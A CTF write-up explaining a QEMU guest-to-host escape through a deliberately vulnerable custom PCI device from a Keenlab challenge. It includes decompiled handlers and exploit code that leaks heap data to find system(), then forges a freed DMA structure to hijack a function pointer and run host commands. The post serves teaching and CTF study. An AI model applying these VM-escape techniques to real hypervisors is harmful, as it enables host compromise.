It’s a great challenge to get familiar with QEMU escape. We are going to exploit QEMU via a custom vulnerable device.

You should read VM escape - QEMU Case Study before reading this writeup.

Challenge

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
challenge
├── dependency
│   ├── libnettle.so.6.2
│   └── usr
│       └── local
│           └── share
│               └── qemu
│                   ├── bios-256k.bin
│                   ├── efi-e1000.rom
│                   ├── kvmvapic.bin
│                   ├── linuxboot_dma.bin
│                   └── vgabios-stdvga.bin
├── launch.sh
├── qemu-system-x86_64
├── rootfs.cpio
└── vmlinuz-4.8.0-52-generic

There is a qemu-system-x86_64 binary with a launch script, a Linux kernel, an initramfs and some dependencies.

We can get an interactive shell by executing launch.sh.

1
2
3
4
5
6
7
8
9
10
11
__ __ _____________ __ __ ___ ____
/ //_// ____/ ____/ | / / / / / | / __ )
/ ,< / __/ / __/ / |/ / / / / /| | / __ |
/ /| |/ /___/ /___/ /| / / /___/ ___ |/ /_/ /
/_/ |_/_____/_____/_/ |_/ /_____/_/ |_/_____/
Welcome to Tencent Keenlab
Tencent login: root
# uname -r
4.8.0-52-generic
#

The custom vulnerable device

launch.sh shows that there are two custom devices named vdd.

1
2
$ ./qemu-system-x86_64 -device help 2>&1 | grep VDD
name "VDD", bus PCI, desc "KeenLab virtualized Devices For Testing D"

We can use the following commands to find these devices and their I/O port and memory regions.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:05.0 Class 00ff: 1234:2333
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
# cat /proc/iomem
...
fe900000-fe9fffff : 0000:00:04.0
fea00000-feafffff : 0000:00:05.0
...
# cat /proc/ioports
...
c000-c0ff : 0000:00:04.0
c100-c1ff : 0000:00:05.0
...

OOBW

In vdd_mmio_write, there is an out-of-bounds vulnerability which copies QEMU heap memory (read past the end of dma_buf) to guest physical memory when we set dma_len larger than sizeof(dma_buf).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// Decompiled MMIO write handler of the VDD device (excerpt; "..." marks
// code elided by the author).
//   opaque - device state (TencentPCIState)
//   addr   - offset written inside the MMIO region
//   val    - value written by the guest (unused in this excerpt)
//   size   - access width (unused in this excerpt)
void __fastcall vdd_mmio_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
int64_t v4; // rax@21
if ( opaque->dma_state )
{
...
else
{
switch ( addr )
{
...
// Offset 32: call the dma_state->phys_mem_write callback with
// (dma_buf, dma_state->dst, dma_len).
case 32uLL:
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
opaque->dma_buf,
opaque->dma_state->dst,
// dma_len is passed through as-is; no clamp to the size of dma_buf
// is visible in this excerpt.
opaque->dma_len); // OOB write
break;
...
}
}
}
}

UAF

Also in vdd_mmio_write, if addr == 128 and (opaque->sr[129] & 1) != 0, we can arm a timer that will execute vdd_dma_timer opaque->expire_time ns later.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
// Decompiled MMIO write handler of the VDD device (excerpt showing the
// timer path; "..." marks code elided by the author, so the braces below
// do not balance within the excerpt).
void __fastcall vdd_mmio_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
int64_t v4; // rax@21
if ( opaque->dma_state )
{
...
else if ( addr > 0x24 )
{
// Offset 128: schedule dma_timer, but only when bit 0 of sr[129] is set.
if ( addr == 128 )
{
if ( opaque->sr[129] & 1 )
{
// Expiry = current time of clock 0 in ns + opaque->expire_time.
v4 = qemu_clock_get_ns(0);
timer_mod(&opaque->dma_timer, v4 + opaque->expire_time);
}
}
...
}
}

In vdd_dma_timer, it invokes opaque->dma_state->phys_mem_read/write.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// Decompiled timer callback of the VDD device.
// Dispatches one DMA transfer through a function pointer stored in
// opaque->dma_state, selected by dma_state->cmd.
void __fastcall vdd_dma_timer(TencentPCIState *opaque)
{
// cmd != 0: call dma_state->phys_mem_read(dma_buf, dst, dma_len & 0x2FF).
if ( opaque->dma_state->cmd )
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_read)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len & 0x2FF);
// cmd == 0: call dma_state->phys_mem_write with the same three arguments.
else
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len & 0x2FF);
// cmd is read again after the callback returns; an interrupt (0x100) is
// raised only when it equals 1.
if ( opaque->dma_state->cmd == 1 )
vdd_raise_irq(opaque, 0x100u);
}

If pci_vdd_uninit is invoked before vdd_dma_timer, the dma_state will be used after free.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// Decompiled teardown routine of the VDD device.
// Clears the sr register array and releases dma_state and buf.
void __fastcall pci_vdd_uninit(TencentPCIState *opaque)
{
__int64 v1; // rax@5
__int64 v2; // [rsp+28h] [rbp-8h]@1
// fs:40 load/xor pair - presumably the compiler's stack-protector canary.
v2 = *MK_FP(__FS__, 40LL);
// Zero the 0x100-byte sr array.
memset(opaque->sr, 0, 0x100uLL);
if ( opaque->dma_state )
{
// Wipe 0x330 bytes of dma_state, then free it.
memset(opaque->dma_state, 0, 0x330uLL);
g_free((rcu_head *)opaque->dma_state);
// Note: opaque->dma_state is not reset to NULL here, and nothing in this
// function touches opaque->dma_timer.
}
if ( opaque->buf )
g_free((rcu_head *)opaque->buf);
v1 = *MK_FP(__FS__, 40LL) ^ v2;
}

Exploitation

The exploitation is divided into two steps:

  1. leak QEMU program address.
  2. hijack control flow

Leak QEMU program address

First, we allocate a buffer and get its physical address. Then we set dma_state->dst to our buffer and set dma_len larger than sizeof(dma_buf). Finally, we trigger phys_mem_write by writel(0, piomem + 32). By searching the output, we can find libc addresses and program addresses, then calculate the base addresses of the program and libc.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 * Ask the device to copy `len` bytes of its dma_buf to guest physical
 * address `dst`.
 *
 * dst - guest physical destination address
 * len - value programmed as the device's dma_len
 */
void phys_mem_write(unsigned int dst, unsigned int len)
{
set_dmastate_dst(dst);
set_dmalen(len);
/* A write to MMIO offset 32 reaches `case 32` of vdd_mmio_write. */
writel(0, piomem + 32);
}
/*
 * Dump device memory following dma_buf into a freshly allocated kernel
 * buffer and derive the libc base, the program base and the address of
 * system from it.
 *
 * Results are stored in the globals pbuf, libc_base, prog_base and
 * system_addr. If the buffer cannot be allocated the function logs the
 * failure and returns without touching the device.
 */
void mem_leak(void)
{
    enum {
        LEAK_BUF_SIZE = 0x10000, /* size of the kernel buffer */
        LEAK_LEN = 0x1000        /* bytes requested from the device */
    };

    pbuf = (unsigned long)kmalloc(LEAK_BUF_SIZE, GFP_KERNEL);
    if (!pbuf) {
        /* kmalloc can fail; memset on a NULL buffer would oops the guest. */
        printk("mem_leak: kmalloc failed\n");
        return;
    }
    memset(pbuf, 0, LEAK_BUF_SIZE);

    /* The device writes LEAK_LEN bytes starting at dma_buf into pbuf. */
    phys_mem_write(virt_to_phys(pbuf), LEAK_LEN);
    // xxd(pbuf, LEAK_LEN);

    libc_base = search_libc_addr(pbuf, LEAK_LEN);
    printk("libc base:0x%lx\n", libc_base);
    prog_base = search_prog_addr(pbuf, LEAK_LEN);
    printk("program base:0x%lx\n", prog_base);
    system_addr = prog_base + SYSTEM_OFFSET;
    printk("system addr:0x%lx\n", system_addr);
}

Control RIP

There are three steps to exploit the use-after-free vulnerability:

  1. set a timer
  2. trigger pci_vdd_uninit
  3. reallocate and rewrite dma_state

The following command can trigger pci_vdd_uninit

1
echo 0 > /sys/bus/pci/slots/4/power

When vdd_dma_timer runs, we can control rip.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// Decompiled timer callback of the VDD device (repeated listing).
// Both indirect calls below go through pointers stored in
// opaque->dma_state, so whoever controls that memory controls the call
// target; the first argument is always opaque->dma_buf.
void __fastcall vdd_dma_timer(TencentPCIState *opaque)
{
// cmd != 0 selects the phys_mem_read pointer.
if ( opaque->dma_state->cmd )
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_read)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len & 0x2FF);
// cmd == 0 selects the phys_mem_write pointer.
else
((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
opaque->dma_buf,
opaque->dma_state->dst,
opaque->dma_len & 0x2FF);
// Only cmd == 1 goes on to raise the interrupt.
if ( opaque->dma_state->cmd == 1 )
vdd_raise_irq(opaque, 0x100u);
}

Because QEMU is launched with --nographic -append 'console=ttyS0', we can simply invoke system(cmd) to run a command on the host machine, and the output will be shown in the console.

To invoke system(cmd), we need to:

  1. set opaque->dma_state->phys_mem_read to system
  2. set opaque->dma_buf to cmd
  3. make sure opaque->dma_state->cmd != 0.

In vdd_linear_write, when addr == 0, a buffer of size opaque->dma_len is allocated. Then opaque->dma_len bytes are copied from opaque->dma_state->src into opaque->buf, and from there to opaque->dma_state->dst.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// Decompiled port-I/O write handler of the VDD device (excerpt; "..."
// marks code elided by the author).
// Only acts when dma_state is non-NULL and addr is at most 13.
void __fastcall vdd_linear_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
if ( opaque->dma_state && addr <= 13 )
{
// Decompiler rendering of a jump table indexed by addr.
switch ( (_DWORD)((char *)off_6EF324 + off_6EF324[addr]) )
{
case 0:
// Replace opaque->buf with a fresh zeroed allocation of dma_len bytes.
if ( opaque->buf )
g_free((rcu_head *)opaque->buf);
opaque->buf = (uint8_t *)g_malloc0(opaque->dma_len);
// Fill buf from dma_state->src, then copy it out to dma_state->dst.
vdd_dma_read(opaque->buf, opaque->dma_state->src, opaque->dma_len);
vdd_dma_write(opaque->buf, opaque->dma_state->dst, opaque->dma_len);
break;
...
}
}
}
1
2
3
4
5
6
7
8
9
10
11
void put_fake_dma(void)
{
struct dma fakedma;
fakedma.cmd = 2;
fakedma.phys_mem_read = system_addr;
memcpy(pbuf, (void *)&fakedma, sizeof(fakedma));
set_dmalen(0x330);
set_dmastate_src(virt_to_phys(pbuf));
set_dmastate_dst(virt_to_phys(pbuf));
outb(0, VDB_PORT + 0);
}

Exploit script

Thanks for Atum’s help.

Comment and share

  • page 1 of 1
Author's picture

Eadom

NO PWN NO FUN


@Alibaba


Hangzhou